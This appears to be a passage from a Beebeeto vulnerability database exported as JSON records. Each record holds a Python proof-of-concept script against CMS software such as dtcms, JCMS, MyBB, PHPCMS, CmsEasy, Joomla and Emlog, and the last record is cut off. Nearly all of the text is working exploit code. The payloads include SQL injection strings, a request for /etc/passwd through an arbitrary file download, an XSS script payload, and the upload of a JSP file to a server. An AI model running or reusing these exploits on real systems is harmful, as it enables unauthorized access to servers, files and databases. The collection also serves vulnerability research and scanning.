+{"create_date": "2014-10-28 17:05:44", "name": "dtcms 3.0 /scripts/swfupload/swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5927\u5b69\u5c0f\u5b69", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "dtcms\u6f0f\u6d1e,xss,/scripts/swfupload/swfupload.swf", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0124',\r\n            'name': 'dtcms 3.0 /scripts/swfupload/swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n            'author': '\u5927\u5b69\u5c0f\u5b69',\r\n            'create_date': '2014-10-28',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'dtcms',\r\n            'vul_version': ['3.0'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['dtcms\u6f0f\u6d1e', 'xss', '/scripts/swfupload/swfupload.swf'],\r\n            'desc': 'dtcms 3.0 /scripts/swfupload/swfupload.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2010-069817',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        flash_md5 = \"3a1c6cc728dddc258091a601f28a9c12\"\r\n        verify_url = args['options']['target'] + \"/scripts/swfupload/swfupload.swf\"\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        request = urllib2.Request(verify_url)\r\n        response = urllib2.urlopen(request)\r\n        content = response.read()\r\n        md5_value = md5.new(content).hexdigest()\r\n        if md5_value in flash_md5:\r\n            args['success'] = True\r\n            args['poc_ret']['xss_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "dtcms 3.0 /scripts/swfupload/swfupload.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002", "app_name": "Other", "id": "poc-2014-0124", "layer4_protocol": null}
+{"create_date": "2014-10-28 16:50:56", "name": "\u5927\u6c49JCMS\u5185\u5bb9\u7ba1\u7406\u7cfb\u7edf /jcms/m_5_9/sendreport/downfile.jsp \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "\u96f7\u950b", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "\u5927\u6c49jcms\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,/jcms/m_5_9/sendreport/downfile.jsp,jsp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0122',\r\n            'name': '\u5927\u6c49JCMS\u5185\u5bb9\u7ba1\u7406\u7cfb\u7edf /jcms/m_5_9/sendreport/downfile.jsp \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit',\r\n            'author': '\u96f7\u950b',\r\n            'create_date': '2014-10-28',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'JCMS',\r\n            'vul_version': '5.9',\r\n            'type': 'Arbitrary File Download',\r\n            'tag': ['\u5927\u6c49jcms\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', '/jcms/m_5_9/sendreport/downfile.jsp', 'jsp'],\r\n            'desc': 'N/A',\r\n            'references': ['N/A',\r\n            ]\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + ('/jcms/m_5_9/sendreport/downfile.jsp?filename=/etc/passwd&'\r\n                                                  'savename=passwd.txt')\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if \"root:\" in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "JCMS", "id": "poc-2014-0122", "layer4_protocol": null}
+{"create_date": "2014-10-27 22:54:10", "name": "MyBB MyBBlog 1.0 /inc/plugins/mybblog/modules/tag.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "MyBB\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/inc/plugins/mybblog/modules/tag.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0120',\r\n            'name': 'MyBB MyBBlog 1.0 /inc/plugins/mybblog/modules/tag.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n            'author': 'foundu',\r\n            'create_date': '2014-10-27',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'MyBB',\r\n            'vul_version': ['1.0'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['MyBB\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/inc/plugins/mybblog/modules/tag.php', 'php'],\r\n            'desc': 'N/A',\r\n            'references': ['https://www.yascanner.com/#!/x/20583',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + '/mybblog.php?action=tag&tag=\"/><script>alert(1)</script>'\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '\"/><script>alert(1)</script>' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Location File : \r\n/inc/plugins/mybblog/modules/tag.php\r\n\r\nCode :\r\n\r\nadd_breadcrumb($lang->sprintf($lang->mybblog_tags, $mybb->get_input(\"tag\")), \"mybblog.php?action=tag&tag={$mybb->get_input('tag')}\");\r\n\r\n$articles = Article::getByTag($mybb->get_input(\"tag\"));\r\n\r\nNothing Filtering HTML", "app_name": "MyBB", "id": "poc-2014-0120", "layer4_protocol": null}
+{"create_date": "2014-10-27 11:41:48", "name": "PHPCMS v9 /phpsso_server Infomation Disclosure POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "flsf", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "PHPCMS\u6f0f\u6d1e,/phpsso_server,Infomation Disclosure,\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0117',\r\n            'name': 'PHPCMS v9 /phpsso_server Infomation Disclosure POC',\r\n            'author': 'flsf',\r\n            'create_date': '2014-10-27',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'PHPCMS',\r\n            'vul_version': ['V9'],\r\n            'type': 'Infomation Disclosure',\r\n            'tag': ['PHPCMS\u6f0f\u6d1e', '/phpsso_server', 'Infomation Disclosure', '\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e', 'php'],\r\n            'desc': 'The functions in the global.func.php can not handle with array,so it raise an error.',\r\n            'references': ['',\r\n                           ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + \"/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1&data%5busername%5d=ks\"\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        try:\r\n            request = urllib2.Request(verify_url)\r\n            response = urllib2.urlopen(request)\r\n            content = response.read()\r\n        except urllib2.HTTPError, e:\r\n            content = e.read()\r\n\r\n        match = cls.match_patter(content)\r\n        if match:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n            args['poc_ret']['Disclosure'] = match[0]\r\n            return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    @staticmethod\r\n    def match_patter(content, pattern=r'Warning.*?((?:[a-z]:\\\\(?:[\\\\\\w|\\s|\\-|\\.|\\x81-\\xfe|\\x40-\\xfe]+?)global\\.func\\.php)|(?:/[^<>]+?global\\.func\\.php))'):\r\n        match = re.findall(pattern, content, re.I|re.M)\r\n        return match\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "The functions in the global.func.php can not handle with array,so it raise an error.", "app_name": "phpcms", "id": "poc-2014-0117", "layer4_protocol": null}
+{"create_date": "2014-10-27 00:09:17", "name": "CmsEasy 5.5 <=20140718 /index.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 0, "author": "H4rdy", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "CmsEasy\u76f2\u6ce8\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/index.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\nimport datetime\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0116',\r\n            'name': 'CmsEasy 5.5 <=20140718 /index.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': 'H4rdy',\r\n            'create_date': '2014-10-25',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'CmsEasy',\r\n            'vul_version': ['5.5'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['CmsEasy\u76f2\u6ce8\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/index.php', 'php'],\r\n            'desc': 'CmsEasy 5.5 <=20140718 /lib/table/stats.php\u4e2d$_SERVER\u5e76\u6ca1\u6709\u8f6c\u4e49\uff0c\u9020\u6210\u4e86\u6ce8\u5165.',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2010-069343',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = \"/index.php/aaa',(select/**/if((select/**/ord(substr(user(),1,1)))=114,sleep(6),0)),1)#\"\r\n        verify_url = args['options']['target'] + payload\r\n        user_agent = {'User-Agent':'i am baiduspider'}\r\n        req = urllib2.Request(verify_url, headers=user_agent)\r\n        first_time = datetime.datetime.now()\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        last_time = datetime.datetime.now()\r\n        different_time = (last_time-first_time).seconds\r\n        if different_time>=6:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "CmsEasy 5.5 <=20140718 /lib/table/stats.php\u4e2d$_SERVER\u5e76\u6ca1\u6709\u8f6c\u4e49\uff0c\u9020\u6210\u4e86\u6ce8\u5165.", "app_name": "CmsEasy", "id": "poc-2014-0116", "layer4_protocol": null}
+{"create_date": "2014-10-24 20:20:17", "name": "Joomla Spider Form Maker <=3.4 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "H4rdy", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Joomla\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/index.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0111',\r\n            'name': 'Joomla Spider Form Maker <=3.4 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': 'H4rdy',\r\n            'create_date': '2014-10-24',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Joomla Spider From Maker',\r\n            'vul_version': ['<=3.4'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['Joomla\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/index.php'],\r\n            'desc': 'Joomla 3.4 /index.php \u6587\u4ef6\"id\" \u53d8\u91cf\u6ca1\u6709\u8fdb\u884c\u8fc7\u6ee4.',\r\n            'references': ['http://www.exploit-db.com/exploits/34637/',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = (\"/index.php?option=com_formmaker&view=formmaker&id=1%20UNION%20ALL%20SELECT%20NULL,\"\r\n                   \"NULL,NULL,NULL,NULL,CONCAT(0x7165696a71,IFNULL(CAST(md5(3.1415)%20AS%20CHAR),0x20),\"\r\n                   \"0x7175647871),NULL,NULL,NULL,NULL,NULL,NULL,NULL%23\")\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if \"63e1f04640e83605c1d177544a5a0488\" in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Joomla 3.4 /index.php \u6587\u4ef6\"id\" \u53d8\u91cf\u6ca1\u6709\u8fdb\u884c\u8fc7\u6ee4.", "app_name": "Joomla", "id": "poc-2014-0111", "layer4_protocol": null}
+{"create_date": "2014-10-23 21:50:56", "name": "Hanweb jcms /opr_import_discussion.jsp \u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "flsf", "rank": 4, "port": null, "vul_type": "\u6587\u4ef6\u4e0a\u4f20", "tag": "Hanweb\u6f0f\u6d1e,/opr_import_discussion.jsp,File Upload,jsp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0109',\r\n            'name': 'Hanweb jcms /opr_import_discussion.jsp \u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e POC',\r\n            'author': 'flsf',\r\n            'create_date': '2014-10-23',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Hanweb jcms',\r\n            'vul_version': ['*'],\r\n            'type': 'File Upload',\r\n            'tag': ['Hanweb\u6f0f\u6d1e', '/opr_import_discussion.jsp', 'File Upload', 'jsp'],\r\n            'desc': '''\r\n                    http://127.0.0.1/jcms/m_5_e/module/idea/opr_import_discussion.jsp?typeid=0&fn_billstatus=S\r\n                    \u53ef\u4e0a\u4f20\u6587\u4ef6,\u672a\u9650\u5236\u4e0a\u4f20\u6587\u4ef6\u7c7b\u578b,\u5bfc\u81f4\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u3002\r\n                    ''',\r\n            'references': ['http://wooyun.org/bugs/wooyun-2014-075585',\r\n                           ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + \"/jcms/jcms_files/jcms/web0/site/module/idea/tem/upload/v.jsp\"\r\n        target_url = args['options']['target'] + \"/jcms/m_5_e/module/idea/opr_import_discussion.jsp?typeid=0&fn_billstatus=S\"\r\n        file_v_jsp = '''<%@ page import=\"java.util.*,java.io.*\" %>\r\n        <%@ page import=\"java.io.*\"%>\r\n        <%\r\n        String path=application.getRealPath(request.getRequestURI());\r\n        File d=new File(path);\r\n        out.println(path);\r\n        if(d.exists()){\r\n        d.delete();\r\n        }\r\n        %>\r\n        <% out.println(\"00799a96dcc29282dd74e23e49b647a6a\");%>\r\n        '''\r\n        files = {'file': ('v.jsp', file_v_jsp, 'multipart/form-data')}\r\n\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n\r\n        response = requests.post(target_url, files=files) # \u4e0a\u4f20\r\n        response = requests.get(verify_url) # \u9a8c\u8bc1\r\n        content = response.content\r\n        if '00799a96dcc29282dd74e23e49b647a6a' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n            return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "http://127.0.0.1/jcms/m_5_e/module/idea/opr_import_discussion.jsp?typeid=0&fn_billstatus=S\r\n\u53ef\u4e0a\u4f20\u6587\u4ef6,\u672a\u9650\u5236\u4e0a\u4f20\u6587\u4ef6\u7c7b\u578b,\u5bfc\u81f4\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u3002", "app_name": "Other", "id": "poc-2014-0109", "layer4_protocol": null}
+{"create_date": "2014-10-23 00:20:15", "name": "U-Mail /webmail/userapply.php \u8def\u5f84\u6cc4\u6f0f POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u96f7\u8702", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Information Disclosure,U-Mail\u6f0f\u6d1e,/webmail/userapply.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0105',\r\n            'name': 'U-Mail /webmail/userapply.php \u8def\u5f84\u6cc4\u6f0f POC',\r\n            'author': '\u53f6\u5b50',\r\n            'create_date': '2014-10-23',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'U-Mail',\r\n            'vul_version': ['*'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['Information Disclosure', 'U-Mail\u6f0f\u6d1e', '/webmail/userapply.php'],\r\n            'desc': 'N/A',\r\n            'references': ['http://wooyun.org/bugs/wooyun-2010-049525'],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + '/webmail/userapply.php?execadd=333&DomainID=111'\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        res = re.compile(r'supplied argument is not a valid MySQL result resource in <b>(.*)</b> on line')\r\n        match = res.findall(content)\r\n        if match:\r\n            if '<b>Warning</b>:' in content:\r\n                args['success'] = True\r\n                args['poc_ret']['vul_url'] = verify_url\r\n                return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "U-Mail", "id": "poc-2014-0105", "layer4_protocol": null}
+{"create_date": "2014-10-22 20:26:10", "name": "Emlog 5.3.1 /include/lib/js/uploadify/uploadify.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5927\u5b69\u5c0f\u5b69", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "emblog\u6f0f\u6d1e,xss,php,/uploadify.swf", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0103',  # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n            'name': 'Emlog 5.3.1 /include/lib/js/uploadify/uploadify.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',  # \u540d\u79f0\r\n            'author': '\u5927\u5b69\u5c0f\u5b69',  # \u4f5c\u8005\r\n            'create_date': '2014-10-22',  # \u7f16\u5199\u65e5\u671f\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',  # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n            'port': [80],  # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n            'layer4_protocol': ['tcp'],  # \u8be5\u534f\u8bae\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'emblog',  # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version': ['5.3.1'],  # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'Cross Site Scripting',  # \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['emblog\u6f0f\u6d1e', 'xss', 'php', '/uploadify.swf'],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': 'emblog include/lib/js/uploadify/uploadify.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2010-069818',  # \u53c2\u8003\u94fe\u63a5\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        flash_md5 = \"3a1c6cc728dddc258091a601f28a9c12\"\r\n        verify_url = args['options']['target'] + \"/include/lib/js/uploadify/uploadify.swf\"\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        request = urllib2.Request(verify_url)\r\n        response = urllib2.urlopen(request)\r\n        content = response.read()\r\n        md5_value = md5.new(content).hexdigest()\r\n        if md5_value in flash_md5:\r\n            args['success'] = True\r\n            args['poc_ret']['xss_url'] = verify_url\r\n            return args\r\n        else:\r\n            args['success'] = False\r\n            return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "emblog include/lib/js/uploadify/uploadify.swf\u6587\u4ef6\u5b58\u5728FlashXss\u6f0f\u6d1e\u3002", "app_name": "Emlog", "id": "poc-2014-0103", "layer4_protocol": null}
+{"create_date": "2014-10-22 14:24:25", "name": "Typecho 0.9(13.12.12) CSRF\u4fee\u6539\u7ba1\u7406\u5458\u5bc6\u7801\u6f0f\u6d1e Exploit", "level": "\u4f4e\u5371", "batchable": 0, "author": "\u96f7\u8702", "rank": 2, "port": null, "vul_type": "CSRF", "tag": "Typecho\u6f0f\u6d1e,CSRF\u4fee\u6539\u7ba1\u7406\u5458\u5bc6\u7801\u6f0f\u6d1e,/profile.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0102',\r\n            'name': 'Typecho 0.9(13.12.12) CSRF\u4fee\u6539\u7ba1\u7406\u5458\u5bc6\u7801\u6f0f\u6d1e Exploit',\r\n            'author': '\u96f7\u8702',\r\n            'create_date': '2014-10-22',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Typecho',\r\n            'vul_version': ['0.9'],\r\n            'type': 'Cross Site Request Forgery',\r\n            'tag': ['Typecho\u6f0f\u6d1e', 